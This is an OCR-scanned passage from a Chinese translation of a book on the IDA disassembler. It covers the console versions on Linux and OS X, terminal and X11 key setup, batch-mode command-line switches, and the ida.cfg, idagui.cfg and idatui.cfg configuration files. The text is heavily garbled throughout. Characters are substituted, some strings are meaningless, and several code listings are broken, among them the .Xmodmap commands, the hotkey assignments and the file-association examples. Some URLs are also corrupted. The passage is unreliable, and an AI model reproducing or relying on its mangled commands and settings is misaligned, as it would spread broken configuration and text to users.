你 可 以 在 Linux 上 运行 IDA， 但 将 X11 窗口 转发 到 〈 当然 ， 需 要 通过 ssh) 一 台 Mac HAE- 

使 用 Hex-Rays 提供 的 TVision 库 远 程 访问 基于 Linux 的 IDA 时 ， 建 议 你 配置 终端 软件 模拟 
一 个 xterm ( 请 参考 tvtuning.txt 文件 和 终端 模拟 融 的 文档 资料 ， 了 解 更 多 信息 ), 然后 根据 
tvtuning.txt 文件 中 的 说 明 启 动 IDA。 例 如 ， 你 必须 指定 TVOPT=xtrack， 以 便 在 将 SecureCRT 作为 
终端 模拟 器 时 ，IDA 能 够 支持 鼠标 。 

当然 ， 也 可 以 导出 TVOPT 设置 ， 免 得 在 每 次 启动 IDA 时 痢 需 要 指定 这 些 设 置 。 有 关 TVision 
选项 的 全 面 介 绍 ， 请 参考 TVision 源 代 码 中 的 liunx.cpp 文件 。 

只 有 在 窗口 环境 中 运行 IDA， 并 且 已 配置 ida.cfg 中 的 GRAPH. VISUALIZER 变量 指向 适当 的 图 
攻 呈 现 程序 ”的 情况 下 ， 才 可 以 在 Linux 控制 台 版 本 中 查看 外 部 图 形 。IDA 6.0 之 前 的 版 本 只 能 使 
用 GDL 生成 图 形 。 你 可 以 安装 一 个 GDL 查看 器 (如 aiSee^ ) 并 通过 编辑 IDA. 的 主 配置 文件 
<IDADIR>/cfg/ida.cfg 来 配置 IDA 启动 这 个 新 的 应 用 程序 。 配 置 选项 GRAPH. VISUALIZER 指定 用 于 
查看 IDA 的 GDL 图 形 ( 全 部 为 遗留 图 形 ) 的 命令 。 上 默认 的 设置 如 下 所 示 : 




















GRAPH VISUALIZER = "qwingraph.exe -remove -timelimit 10" 


remove 选项 要 求 qwingraph 删除 输入 文件 ， 在 你 显示 临时 文件 时 ， 将 会 用 到 这 个 选项 。 
timelimit 选项 指定 生成 一 幅 完 美的 图 形 所 用 的 时 间 ( 秒 )。 如 果 在 这 个 时 间 内 无 法 生成 完美 的 
图 形 ，qwingraph 将 切换 到 “快速 而 丑陋 的 ” “布局 算法 。 从 IDA 6.0 开始 ，GRAPH VISUALIZER 
选项 包含 在 一 个 条 件 块 内 ， 用 于 为 Windows 和 非 Windows 平台 提供 单独 的 设置 。 如 果 你 在 非 
Windows 平台 上 编辑 ida.cfg 文件 ， 请 确保 编辑 该 文件 的 正确 部 分 。 如 采 你 已 安 半 aiSee 之 类 的 
GDL 查看 器 ， 则 需要 编辑 GRAPH VISUALIZER， 使 它 指 向 你 选择 的 查看 器 。 使 用 aiSee 查看 器 的 











GRAPH VISUALIZER - "/usr/local/bin/aisee" 


(D 参见 http://simon.baymoo.org/universe/ida/tvision/; 

(2 25 92, 

(3) GDL 查看 器 aiSee 可 在 许多 平台 上 运行 ， 并 可 免费 用 于 非 商业 用 途 ， 其 下 载 地 址 为 http:/www.aisee.de/。 
(4) 参见 wingraph32 或 者 qwingraph 源 代码 中 的 timelm.c 文件 。 
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需要 注意 的 是 ,最 好 指定 GDL 查看 融 的 完整 路 径 ， 以 方便 IDA 碍 找 。 最 后 , 由 于 qwingraph 
为 开源 软件 ， 旧 版 IDA 用 户 可 从 Hex-Rays 免费 下 载 qwingraph 的 源 代码 ( 参见 第 9 草 ), 构建 该 
软件 ， 然 后 将 qwingraph 整合 到 IDA 安装 中 。 


10.4.4. OS X 控 制 台 


OS 和 X 的 IDA 控 制 侣 版 本 的 名 称 与 Linux 版 本 相似 (idal 和 idal64 )。 和 Linux 及 Windows f^ 
制 台 版 本 一 样 ，OS X 版 本 也 依靠 TVision 库 支持 它 的 控制 台 输 入 /输出 。 

由 于 Mac 键盘 与 PC 键盘 的 布局 不 同 ， 这 给 运行 Mac 版 本 的 IDA 造成 了 一 些 挑战 。 其 主要 
原因 在 于 : 就 应 用 程序 菜单 而 言 ，Mac 的 OPTION/ALT 键 与 PC 的 ALT 键 的 作用 并 不 相同 。 

鉴于 此 ， 要 运行 IDA， 最 好 使 用 Mac 的 Terminal 应 用 程序 。 在 使 用 Terminal 运行 IDA 时 ， 
一 定 要 将 OPTION 键 配 置 成 IDA 中 的 ALT 键 。 这 样 ， 你 就 可 以 通过 键盘 使 用 IDA 中 与 ALT 键 
有 关 的 快捷 键 , 如 IDA 的 所 有 主 菜单 (例如 , H ALT 访问 File 菜单 )。 如 果 你 没有 选择 这 个 选 
项 , 就 必须 用 ESC HERE ALT 键 。 因此, 按 下 ESC 和 了 下 键 将 打开 File 菜单 。 由 于 在 IDA 中 ESC 
具有 后 退 或 关闭 窗口 的 功能 ， 我 们 不 推荐 使 用 这 种 方法 。 终 端 检查 硕 对 话 框 如 图 10-1 所 示 ， 在 
Terminal 处 于 活动 状态 时 ， 通 过 Terminal » Preferences 即 可 打开 这 个 对 话 框 。 选 择 Use option key 
as meta key (f option 键 作 为 元 键 ) 复 选 枉 ，OPTION 键 将 作为 ALT 键 使 用 。 

















| Text Window Shell ^ Keyboard ^ Advanced | 


Key Action 
control cursor left 1033[5D 
control cursor right 1033[5C D 
end scroll to end of buffer 
Fl 10330P 
F2 10330Q 
F3 10330R 
F4 103305 
F5 1033[15- 
F6 1033[17- 
Ocean F7 1033[18- 
F8 1033[19- 
F9 1033/20- 


| * |— | Edit 





—* Novel 





Pro 





ME Red Sands IVÍ use opticn as meta key 











图 10-1 Mac OSX 终 端 键盘 设置 对 话 框 


Terminal 的 一 个 洪 在 替代 者 是 ITERM", 它 不 但 可 实现 OPTION 键 的 ALT 键 功能 , 而 且 提 供 
鼠标 支持 。 许 多 开发 者 喜欢 使 用 的 另 一 种 终端 为 gnome Aim, 它 已 经 被 移植 ?到 OSX 的 XII 上 。 





(D 参见 http://iterm.sourceforge.net/; 
(2) 参见 http://www.macports.org/ ; 
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由 于 使 用 这 种 终端 需要 安装 XCODE 和 X11, ， 对 此 我 们 不 做 过 多 讨论 。 对 多 数 用 户 而 言 ， 使 用 默 
认 的 Terminal 或 iTERM 就 已 经 足够 了 。 

在 OSX 上 运行 IDA 的 男 一 种 方法 是 安装 X11( 在 OSX 安 装 磁盘 的 一 个 可 选 包 中 ) 和 Jeremy 
Cooper 改良 的 TVision JÆ (用 于 OS X 的 libtvision.dylib 文件 ), 将 IDA 作为 本 地 X11 应 用 程序 运 
行 。 你 可 能 希望 将 /usr/X11R6/bin 添加 到 系统 的 PATH 中 ( 编辑 /etc/profile 中 的 PATH )， 以 便于 访 
问 与 X11 有 关 的 库 。 

在 这 种 配置 中 ，IDA 可 能 会 从 一 个 xterm 中 启动 ， 它 将 在 自己 的 窗口 中 运行 ， 并 文 持 鼠标 的 
全 部 功能 。 但 是 , 与 OPTION/ALT 键 有 关 的 问题 仍然 存在 ， 因 为 X11 把 这 个 键 视 为 Mode_switch， 
而 无 法 将 其 传递 给 IDA。 不 过 , 通过 X11 可 使 用 xmodmap 实用 工具 重新 设置 热 键 。 其 中 一 个 解 
决 办 法 是 在 你 的 根 目录 下 创建 (或 编辑 ) 一 个 名 为 .Xmodmap 的 文件 ( 如 /Users/idabook/.Xmodmap ), 
其 中 包含 以 下 命令 : 

















clear Mod1 
keycode 66 
keycode 69 
add Mod1 = 
add Mod1 = 


Alt L 
Alt R 
lt L 
lt R 


D D I i 


默认 的 X11 启动 脚本 (/etc/X11/xinit/xinitre) 中 包含 启动 X11 时 读 取 .Xmodmap 的 命令 。 如 
果 你 已 经 创建 了 自己 的 .xinitrc 文件 , CHR AAH xinitre 文件 , 你 必须 确保 其 中 包含 一 个 与 下 
HRUNS, S, Xmodmap 文件 将 无 法 运行 。 


@ xmodmap $HOME/.Xmodmap 


最 后 ， 你 需要 修改 X11 的 默认 设置 ， 以 防止 系统 重 写 已 修改 的 热 键 设 置 。X11 Preferences 对 
话 框 如 图 10-2 所 示 。 


.X11 Preferences 


input Output Security | 


Í Emulate three button mouse 
Hold Option and Command while clicking ta activate the middle and 
right mouse buttons. 

[Follow system keyboard layout 


Allows input menu changes to overwrite the current X11 keymap. 


WÍ Enable key equivalents under X11 


When enabled, menu bar key equivalents may interfere with X11 
applications that use the Meta modifier. 





图 10-2 OS X EH XII Preferences 对 话 框 
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为 了 防止 系统 重 写 键盘 设置 ， 必 须 取消 中 间 的 选项 : Follow system keyboard layout ( 35 88 Z 
统 键盘 布局 ) 取消 这 个 选项 后 ， 重 新 启动 X11， 你 修改 的 键盘 设置 将 会 生效 ， 然 后 ， 你 就 可 以 
使 用 ALT 键 访问 IDA 的 菜单 。 你 可 以 使 用 xmodmap 打印 当前 的 键盘 修饰 符 列表 ， 验 证 X11 Ra 
能 够 识别 ALT 键 ， 如 下 所 示 : 


idabook:^ idabook$ xmodmap 
xmodmap: up to 2 keys per modifier, (keycodes in parentheses): 


shift Shift L (0x40), Shift R (0x44) 

lock Caps Lock (0x41) 

control Control L (0x43), Control R (0x46) 
O nodi Alt L (0x42), Alt R (0x45) 

mod2 Meta L (Ox3f) 

mod3 

mod4 

mod5 


如 果 mod) RAZIJA ALT_L 和 ALT_R， 如 @ 处 所 示 ， 则 表示 你 的 键盘 设置 并 未 生效 。 这 时 ， 知 
要 重新 运行 @ 处 列 出 的 xmodmap 命令 。 


10.2 ”使 用 IDA 的 批量 模式 


所 有 版 本 的 IDA 都 可 以 在 批量 模式 下 运行 ， 以 完成 目 动人 处 理 任务 。 使 用 批量 模式 的 主要 目 
的 是 启动 DA， 使 它 运 行 一 段 特定 的 IDC 脚本 ， 并 在 该 脚本 完成 后 立即 终止 。 在 批量 模式 下 ， 
你 可 以 使 用 几 个 命令 行 选 项 控制 IDA 所 执行 的 处 理 。 

GUI 版 本 的 IDA 并 不 需要 控制 台 来 运行 ， 这 使 得 它们 可 以 非常 轻松 地 合并 到 几乎 任何 类 型 
的 自动 脚本 或 包装 程序 中 。 在 批量 模式 下 运行 时 ，GUI 版 本 的 IDA 并 不 显示 任何 图 形 组 件 。 运 
fT Windows 控制 台 版 本 (idaw.exe 和 idaw64.exe ) 会 生成 一 个 完整 的 控制 台 和 窗口 ， 在 批 处 理 结 
时 ， 这 个 窗口 会 日 动 关闭 。 通 过 将 输出 重 定 问 到 一 个 空 设 备 (cmd.exe 的 为 NUL， 在 cygwin 的 
/dev/null 目录 中 )， 可 以 禁用 控制 台 窗 口 ， 如 下 所 示 : 














C:\Program FilesMIda»idaw -B some program.exe > NUL 

IDA 的 批量 模式 由 以 下 命令 行 参数 控制 。 

Q -A 选项 使 IDA 在 自动 模式 下 运行 ， 这 表示 IDA 不 会 显示 需要 用 户 交 互 的 对 话 框 。( 实际 
上 ， 如 有 果 你 从 未 单 击 IDA 的 许可 协议 ， 那么 无 论 你 是 否 使 用 这 个 选项 ， 许 可 协议 对 话 框 

















都 会 显示 。 
O -c 选项 要 求 DA 删除 与 在 命令 行 中 指定 的 文件 有 关 的 任何 现 有 数据 库 ， 并 生成 一 个 全 新 
的 数据 库 。 


O -$ 选项 用 于 指定 IDA 在 启动 时 应 运行 哪 一 段 IDC 脚本 。 运 行 myscriptide 的 语法 为 
-Smyscript.idc (在 S$ 与 脚本 名 称 之 间 没 有 空格 )。IDA 会 在 <IDADIR>/idc 目录 中 搜索 指 
定 的 脚本 。 如 条 已 经 安 痛 IDAPython, 也 可 以 在 这 里 指定 Python 脚本 。 
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Q -B 选项 调用 批量 模式 ， 它 等 同 于 在 执行 时 对 IDA 使 用 -A -c -Sanalysis.idcs IDA 自 带 的 
analysis.idc 脚本 会 等 待 IDA 分 析 在 命令 行 中 指定 的 文件 ， 然 后 再 转 储 反 汇编 代码 的 汇编 
列表 (asm 文件 ) 并 关闭 IDA， 以 保存 和 关闭 新 生成 的 数据 库 。 

-S 选项 实际 上 是 批量 模式 的 关键 ， 因 为 只 有 指定 的 脚本 使 IDA 终止 ，IDA 才 会 终止 。 如 果 
脚本 没有 关闭 IDA， 那 么 ， 所 有 的 选项 将 组 合 在 一 起 ， 肯 动 完 成 IDA 的 启动 过 程 。 我 们 将 在 第 
15 章 中 讨论 如 何 编写 IDC 脚本 。 由 于 Linux 和 0OSX 版 本 的 IDA 使 用 的 TVision 库存 在 限制 ,， 批 
处 理 必须 从 TTY 控制 台 执 行 ， 并且 无 法 进行 后 台 处 理 ( 和 重 定 问 )。 科 好 最 新 版 本 的 TVision 能 
识别 TVHEADLESS 环境 变量 ， 因 而 允许 重 定 癌 控制 台 输 出 (stdout )， 如 下 所 示 : 














# TVHEADLESS=1 ./idal -B input file.exe > /dev/null 


完全 脱离 控制 台 以 在 后 台 执行 需要 对 stdin 和 stderr 进行 额外 的 重 定 向 。 

Ilfak 在 他 的 一 篇 博客 文章 中 谈 到 批量 模式 ， 地 址 为 http:/hexblog.com/2007/03/on batch ` 
analysis.html。 他 还 详细 说 明了 如 何 执行 除 调用 单独 一 段 脚本 以 外 的 操作 ， 并 讨论 了 如 何在 批量 
模式 下 运行 IDA 插件 。 


10.3 ”小结 


虽然 GUI 版 本 的 IDA 仍然 是 功能 最 全 面 的 版 本 ， 但 控制 合 模式 和 批 处 理 功能 为 IDA. 用 户 提 
供 了 极 大 的 灵活 性 ， 可 利用 IDA 的 目 动 分 析 功 能 创建 复杂 的 分 析 解 决 方案 。 

ESHE, RECAM IDA 的 所 有 基本 功能 ， 现 在 ， 是 时 候 讨论 高 级 功能 了 。 在 接 下 
来 的 儿 章 中 ， 我 们 将 介绍 IDA 的 一 些 更 加 有 用 的 配置 选项 ， 以 及 其 他 专用 于 改善 IDA 的 二 进 制 
文件 分 析 功 能 的 实用 工具 。 

















IDA 高 级 应 用 


使 用 FLIRT 签 名 来 识别 库 


修补 二 进 制 文件 及 其 他 IDA 限制 








Æ 制 IDA 








1 用 IDA —BzHRIE, MORA Y HoBJEEDURE. Ha EERE A — T1 EIC 

FER, IDA 郡 玩 认 使 用 这 些 设置 。 你 更 改 的 一 些 选 项 在 不 同 的 任务 中 始终 保持 一 致 ， 
而 其 他 选项 似乎 在 你 每 次 加 载 新 数据 库 时 六 需要 重新 设置 .本章 将 介绍 各 种 通过 配置 文件 和 沫 单 
选项 修改 IDA 行为 的 方法 。 我 们 还 将 指出 IDA 存储 各 种 配置 的 位 置 ， 并 讨论 特定 于 数据 库 的 设 
置 与 全 局 设置 之 间 的 差异 。 


11.4 配置 文件 


IDA 的 许多 黑 认 行为 由 各 种 配置 文件 中 的 设置 控制 。 多 数 情 况 下 ， 配 置 文件 存储 在 
<IDADIR>/cfg 目录 中 。 插 件 配置 文件 是 唯一 的 例外 ， 它 的 位 置 为 <IDADIR>/plugins/plugins.cfg 
( plugins.cfg 将 在 第 17 章 中 介绍 ) 你 可 能 已 经 注意 到 ,主要 配置 目录 中 有 相当 多 的 文件 , 但 是 绝 
大 多 数 的 文件 都 被 处 理 带 模块 使 用 , 并 且 只 适用 于 分 析 某 些 类 型 的 CPU。 其 中 3 个 主要 的 配置 文 
件 分 别 为 ida.cfg idagui.cfg 和 idatui.cfg; 38b d$, i5 HT Pr IDA 版 本 的 选项 保存 在 ida.cfg 文件 
H, mj idagui.cfg 和 idatui.cfg 中 的 选项 分 别针 对 IDA 的 GUI 版 本 和 文本 模式 的 版 本 。 




















11.1.1 主 配置 文件 : ida.cfg 


IDA 的 主 配置 文件 为 ida.cfg。 早 在 启动 过 程 中 ，IDA 就 读 取 了 这 个 文件 , 给 各 种 文件 扩展 名 
分 配 默 认 的 处 理 需 类 型 ， 并 调整 IDA 的 内 存 使 用 参数 。 指 定 处 理 需 类 型 后 ，IDA 会 再 次 谈 取 这 
个 文件 ， 以 处 理 其 他 配置 选项 。ida.cfg 中 包含 的 选项 适用 于 所 有 版 本 的 IDA, 无 论 你 使 用 什么 用 
户 界 面 。 

如 第 9 章 所 述 ，ida.cfg 中 的 常规 选项 包括 内 存 调整 参数 ( VPAGESIZE )、 是 否 创建 备份 文件 
( CTEATE_BACKUPS ) 以 及 外 部 图 形 碍 看 硕 的 名 称 〈GRAPH_ VISUALIZER )。 

有 时 候 ， 在 处 理 非常 大 的 输入 文件 时 ，IDA 可 能 会 报告 内 存 不 足 ， 因 而 无 法 创建 新 数据 库 。 
在 这 种 情况 下 ， 增 大 VPAGESIZE， 然 后 重新 打开 输入 文件 即 可 解决 问题 。 

ida.cfg 中 还 包含 大 量 用 于 控制 反 汇 编 行 格式 的 选项 ,包括 通过 Options 》 General 访问 的 许多 
选项 的 上 默认 什 。 它 们 包括 要 显示 的 操作 码 字 节 数 的 默认 值 ( 0PCODE_BYTES )、 指 令 的 缩 进 距 离 
( INDENTATION )、 栈 指针 偏 移 量 是 否 应 与 每 条 指令 一 起 显示 ( SHOW_SP )、 每 一 行 反 汇编 代码 中 显示 
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的 交叉 引用 的 最 大 数量 (SHOW XREFS )。 其 他 选项 则 控制 图 形 模式 下 反 汇 编 代码 的 格式 。 

为 已 命名 程序 位 置 ( 相对 于 栈 变 量 ) 指定 最 大 名 称 长 度 的 全 局 选项 为 MAX_NAMES LENGTH， 它 
同样 位 于 ida.cfg 中 。 这 个 选项 的 默认 设置 为 15 个 字符 ， 如 果 你 输入 的 名 称 的 长 度 超出 了 这 个 限 
制 ，IDA 将 显示 一 条 警告 消息 。 这 个 默认 值 较 小 ， 因 为 有 些 汇编 硕 无 法 处 理 超 过 15 个 字符 的 名 
称 。 如 果 你 不 打算 在 汇编 项 中 运行 IDA 生成 的 反 汇 编 代 码 ， 就 可 以 安全 地 增加 这 个 限制 。 

用 户 指定 的 名 称 中 允许 使 用 的 字符 列表 由 NameChars 选项 控制 。 默 认 情 况 下 ， 这 个 列表 人 允许 
使 用 字母 字符 及 4 个 特殊 的 字符 : 、$、? 和 6。 当 你 为 位 置 或 栈 变 量 分 配 新 名 称 时 ， 如 果 IDA 不 
支持 你 希望 使 用 的 字符 ， 这 时 ， 你 可 能 想 要 在 NameChars 字符 集中 增加 额外 的 字符 。 例 如 ， 如 果 
你 想 要 在 IDA 名 称 中 合法 使 用 点 字符 ， 就 需要 修改 NameChars 选项 。 不 过 ,你 应 该 避免 在 名 称 中 
使 用 分 号 、 冒 号 、 有 逗号 和 空格 字符 ， 因 为 它们 可 能 会 造成 混淆 。 通 和 常 ， 这 些 字 符 用 于 将 反 汇 编 行 
的 各 个 部 分 分 隔 开 来 。 

最 后 两 个 需要 注意 的 选项 会 影响 IDA 在 解析 C 头 文件 ( 见 第 8 章 ) 时 的 行为 。C_ HEADER. PATH 
选项 指定 IDA 在 解析 #incliude 依赖 关系 时 搜索 的 目录 列表 。 黑 认 人 情况 下 ， 这 个 选项 会 列 出 微软 
的 Visual Studio 使 用 的 一 个 稼 见 目 录 。 如 采 你 使 用 一 个 不 同 的 编辑 融 ， 或 者 你 的 C 头 文件 位 于 非 
标准 位 置 ， 这 时 你 应 该 考虑 编辑 这 个 选项 。C_PREDEFINED_ MACROS 选项 可 用 于 指定 一 个 预 处 理 安 
默认 列表 ， 无 论 IDA 在 解析 C 头 文件 时 是 否 遇 到 这 些 安 ， 它 都 会 合并 这 个 列表 。 处 理 那些 在 你 
无 法 访问 的 头 文件 中 定义 的 宏 时 ， 这 个 选项 提供 了 一 种 有 限 的 解决 方案 。 

ida.cfg 的 另 一 半 包 含 特定 于 各 种 处 理 天 模块 的 选项 。 对 于 这 些 选 项 ,IDA 提供 的 唯一 参考 信 
县 是 与 每 个 选项 有 关 的 注释 〈 如 果 有 的 话 )。 通 稍 ，ida.cfg 中 特定 于 处 理 硕 的 选项 规定 了 IDA 最 
初 的 “文件 加 载 ” 对 话 框 中 Process Options 部 分 的 默认 设置 。 

处 理 ida.cfg 的 最 后 一 步 是 搜索 一 个 名 为 <IDADIR>/cfgy/idausercfg 的 文件 。 如 果 存 在 ">， 这 个 
文件 将 作为 ida.cfg 的 一 个 扩展 ， 其 中 的 任何 选项 都 将 重 写 ida.cfg 中 的 对 应 选项 。 如 果 不 嘉 欢 编 
辑 ida.cfg, 你 应 该 创建 idauser.cfg, 并 在 其 中 添加 你 想 要 重 写 的 所 有 选项 。 此 外 , 使 用 idauser.cfg, 
你 可 以 更 直接 地 将 定制 的 选项 由 一 个 IDA. 版 本 迁移 到 男 一 个 IDA 版 本 。 例 如 ， 使 用 idauser.cfg, 
每 次 升级 IDA 后 ， 你 不 再 需要 重新 编辑 ida.cfg 文件 ， 而 只 需要 将 现 有 的 idauser.cfg 复制 到 新 版 
的 IDA 中。 






















































































11.1.2 GUI 配置 文件 : idagui.cfg 


GUI 版 本 的 IDA 的 配置 选项 位 于 它们 目 己 的 文件 <IDADIR>/cfg/idagui.cfg 中 。 这 个 文件 大 致 
分 为 3 个 部 分 : 默认 的 GUI 行为 、 键 盘 热 键 对 应 关系 和 File > Open 对 话 框 中 的 文件 扩展 名 配置 。 
本 节 将 讨论 其 中 几 个 比较 重要 的 选项 。 有 关 所 有 可 用 选项 ,请 查阅 idagui.cfg 文件 ， 多 数 情况 下 ， 
每 个 选项 都 有 描述 其 用 途 的 注释 。 

用 户 可 使 用 HELPFILE 选项 指定 一 个 次 要 帮助 文件 。 但 是 ， 这 里 指定 的 任何 文件 都 不 会 代替 
IDA 的 主要 帮助 文件 。 这 个 选项 的 作用 是 ,为 逆 癌 工程 任务 提供 补充 信息 。 如 果 指 定 了 一 个 补充 




















(D IDA 并 没有 上 自 带 这 个 文件 。 如 果 和 希望 IDA 找到 这 个 文件 ， 用 户 必须 自己 创建 这 个 文件 。 
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带 助 文件 , f£ P CTRL+F1，IDA 将 打开 这 个 文件 ， 并 在 其 中 搜索 与 光标 所 在 位 置 的 单词 相 匹配 
的 主题 。 如 来 没有 找到 相 匹 配 的 主题 ,IDA 将 进入 这 个 帮助 文件 的 目录 。 比 方 说 ， 除 非 你 依赖 目 
动 注释 ， 人 否则 IDA 不 会 提供 任何 与 反 汇编 代码 清单 中 指令 助 记 符 有 关 的 帮助 信息 。 如 果 你 正 分 
析 一 个 x86 二 进 制 文件 , 你 可 能 希望 得 到 一 份 有 关 x86 指令 的 文档 资料 。 如 来 你 能 够 找到 一 个 带 
助 文件 ， 其 中 碰巧 包含 与 每 条 x86 指令 有 关 的 信息 *"， 那 么 ,要 想 获 得 任何 指令 的 帮助 信息 ， 只 
需 按 下 一 个 热 键 即 可 。 关 于 补充 玫 助 文件 , 唯一 需要 注意 的 是 : IDA 仅 文 持 旧 版 的 WinHelp "0 BJ] 
文件 〈.hlp )， 不 文 持 将 已 编译 HTML 帮助 文件 〈.chm ) 作为 次 要 帮助 文件 。 





























说 明 OO Windows VistaD000000000 320 WinHeltp (1 D U ü U D U U U D 
WinHlp32.cxe0O00000000000000000000” 917607” *0 





在 使 用 IDA 时 ,人 们 和 常常 提出 同一 个 问题 :“ 我 如 何 使 用 IDA 修补 二 进 制 文件 呢 ? ”简单 地 
说 ， 这 个 问题 的 答案 是 :“ 你 不 能 修补 。” 我 们 在 第 14 草 中 再 讨论 这 个 问题 的 细节 。 使 用 IDA, 
你 所 能 做 的 是 修补 数据 库 ， 以 合适 的 方式 修改 指令 或 数据 。 在 我 们 讨论 编写 脚本 ( 参见 第 15 3€) 
后 ， 你 会 发 现 ， 修改 数 据 库 并 不 是 十 分 困难 。 但 是 ， 如 果 你 对 于 学 习 IDA. 的 脚本 语言 不 感 兴趣 ， 
或 者 缺乏 相关 的 背景 知识 , 那 该 怎么 办 呢 ” 别 担心 , IDA 提供 一 个 数据 库 修 补 菜单 , 默认 情况 下 ， 
IDA 隐藏 了 这 个 菜单 。DISPLAY_PATCH_SUBMENU 选项 用 于 显示 或 隐藏 IDA. 的 补丁 菜单 ， 这 个 菜单 
通过 Edit > Patch Program 访问 。 我 们 将 在 第 14 草 中 讨论 这 个 末 单 中 的 选项 。 

IDA 工作 区 底部 的 单行 输入 框 称 为 IDA 命令 行 。 你 可 以 用 DISPLAY COMMAND LINE 选项 控制 
是 否 显 示 该 输入 框 。 默认 情况 下 会 显示 该 命令 。 如 果 你 的 屏幕 空间 紧张 并 且 预 计 不 需要 输入 单行 
脚本 ， 那 么 关闭 此 功能 可 帮助 你 获得 少量 的 IDA 显示 空间 。 需 要 注意 的 是 ， 这 个 命令 行 并 不 人 允 
许 你 执行 操作 系统 命令 ， 就 像 你 在 命令 提示 符 后 输入 命令 那样 。 

idagui.cfg 的 热 键 配置 部 分 用 于 指定 IDA 操作 与 热 键 组 合 之 间 的 对 应 关系 。 热 键 重新 分 配 可 
用 在 许多 情况 下 , 包括 通过 热 键 执行 额外 的 命令 , 将 默认 的 热 键 组 合 更 改 为 更 加 易于 记忆 的 热 键 
组 合 ， 或 者 更 改 某 些 热 键 ， 避 免 它 们 与 操作 系统 或 终端 应 用 程序 〈 主要 用 于 控制 台 版 本 的 (DA ) 
使 用 的 其 他 热 键 造成 冲突 。 

这 部 分 几乎 列 出 了 IDA 通过 菜单 项 或 工具 栏 按 钮 提供 的 每 一 个 选项 。 遗 憾 的 是 ， 这 里 的 命令 
名 称 与 IDA 的 菜单 文本 并 不 匹配 ， 因 此 ,你 可 能 需要 付出 一 定 的 努力 ， 才 能 将 配置 文件 中 的 选项 
与 特定 的 菜单 选项 对 应 起 来 。 例 如 ，Jump》 Jump to Problem ( 跳 转 > 跳 转 到 问题 ) 命令 等 同 于 
idagui.cfg 中 的 JumpQ 选项 (这 恰好 与 它 的 热 键 CTRL+Q 相 匹 配 )。 此 外 ， 许 多 命令 带 有 描述 其 用 
途 的 注释 ， 但 许多 命令 根本 就 没有 任何 注释 ， 因 此 ， 你 必须 根据 命令 在 配置 文件 中 的 名 称 , 来 决 
定 这 个 命令 的 作用 。 有 助 于 你 确定 与 一 个 配置 文件 操作 对 应 的 菜单 项 的 技巧 是 在 IDA. 的 帮助 系 
统 中 搜索 该 操作 。 一 般 而 言 ， 通 过 这 种 搜索 ， 你 就 可 以 找到 与 这 项 操作 对 应 的 菜单 项 的 说 明 。 

































































(D Pedram Amini 更 喜欢 http://pedram.redhive.com/openrce/opcodes.hlp 中 提 到 的 WinHelp32 文件 。 
(2) 参见 http://support.microsoft.com/kb/917607。 
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下 面 是 在 idagui.cfg 中 分 配 热 键 的 例子 : 


"Abort" 
"Quit IA 


0 // Abort IDA, don't save changes 
"Alt-X" // Quit to DOS, save changes 


第 一 行 代码 是 IDA 的 Abort 命令 的 热 键 分 配 ， 在 这 里 ， 它 并 没有 分 配 到 热 键 。 不 带 引 号 的 0 
EKR IDA 没有 给 命令 分 配 热 键 。 第 二 行 代 码 是 IDA 的 Quit 操作 的 热 键 分 配 。 热 键 组 合用 一 个 
WISTE JE. Æ idagui.cfg 中 有 大 量 热 键 分 配 的 例子 。 

idagui.cfg 的 最 后 一 个 部 分 将 文件 类 型 说 明 与 它们 相关 的 文件 扩展 名 关联 起 来 ， 并 指定 在 
File 》 Open 对 话 框 的 文件 类 型 下 拉 列 表 中 显示 哪些 文件 类 型 。 配 置 文件 已 经 描述 了 大 量 文件 类 
型 , 但 是 , 如 果 你 需要 经 稼 使 用 一 种 配置 文件 并 未 描述 的 文件 类 型 , 可 能 需要 编辑 文件 类 型 列表 ， 
将 你 的 文件 类 型 添加 到 这 个 列表 中 。FILE_EXTENSIONS 选项 描述 了 IDA 已 知 的 所 有 文件 关联 ( file 
association )。 例 如 ， 下 面 的 代码 行 是 文件 类 型 关联 的 一 个 典型 例子 。 




















CLASS JAVA, “Java Class Files", "E alat tels" 


这 个 代码 行 包括 3 个 以 逗号 分 隔 的 部 分 : 关联 的 名 称 (CLASS JAVA )、 一 段 说 明和 一 个 文件 
名 模式 。 在 文件 名 模式 中 可 以 使 用 通配符 ， 多 个 模式 则 用 分 喜 分 隔 开 。 另 一 种 文件 关联 可 将 几 个 
现 有 的 关联 组 合 到 单独 一 个 关联 中 。 例如, 下 面 的 代码 行将 所 有 名 称 以 EXE 开头 的 关联 组 合 到 一 
个 名 为 EXE 的 关联 中 。 

















EXE; "Executable Files", EXE * 





值得 注意 的 是 , 这 里 的 模式 指示 符 并 没有 市 引号 。 我 们 可 以 定义 目 己 的 文件 关联 , JULI Br: 





IDA BOOK, "Ida Book Files", "* book" 


我 们 可 以 为 关联 选择 任何 名 称 ， 只 要 IDA 还 没有 使 用 这 个 名 称 。 但 是 ， 仅 仅 将 一 个 新 的 关 
联 添加 到 FILE EXTENSIONS 列表 中 ， 这 个 关联 并 不 会 在 File » Open 对 话 框 中 显示 出 来 。 
DEFAULT FILE FILTER 选项 列 出 了 所 有 在 File 》 Open 对 话 框 中 出 现 的 关联 的 名 称 。 要 使 新 创建 的 
关联 生效 ， 还 需要 将 IDA_BOOK 57$] DEFAULT FILE FILTER 列表 中 。 

与 idauser.cfg 文件 一 样 ，idagui.cfg 的 最 后 一 行 提供 一 条 指令 来 包含 一 个 名 为 <IDADIR>/cfg/ 
idauserg.cfg 的 文件 。 如 果 不 想 编辑 idagui.cfg ， 就 需要 创建 idauserg.cfg 文件 ， 并 将 你 希望 重 写 的 
所 有 选项 添加 到 这 个 文件 中 。 








11.1.3 ”控制 台 配 置 文件 : idatui.cfg 


对 控制 台 版 本 的 IDA 用 户 而 言 , 与 idagui.cfg 类 似 的 文件 为 <IDADIR>/cfg/idatui.cfg。 这 个 文 
件 的 布局 和 功能 与 idagui.cfg ZE. rat. 它 的 热 键 分 配方 法 也 和 idagui.cfg 完全 相同 。 既 然 
这 两 个 文件 如 此 相似 ， 这 里 我 们 仅 介绍 它们 之 间 的 差异 。 
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首先 , DISPLAY PATCH SUBMENU 和 DISPLAY COMMAND LINE 这 两 个 选项 在 控制 台 版 本 中 无 效 ， 
因此 ，idatui.cfg 文件 中 并 不 包含 这 些 选 项 。 相 对 于 GUI 版 本 中 的 File > Open 对 话 框 ， 控 制 台 
版 本 中 的 对 话 框 要 简单 得 多 ， 因 此 ，idatui.cfeg 文件 中 没有 idagui.cfg 文件 所 包含 的 全 部 文件 关 
联 命令 。 

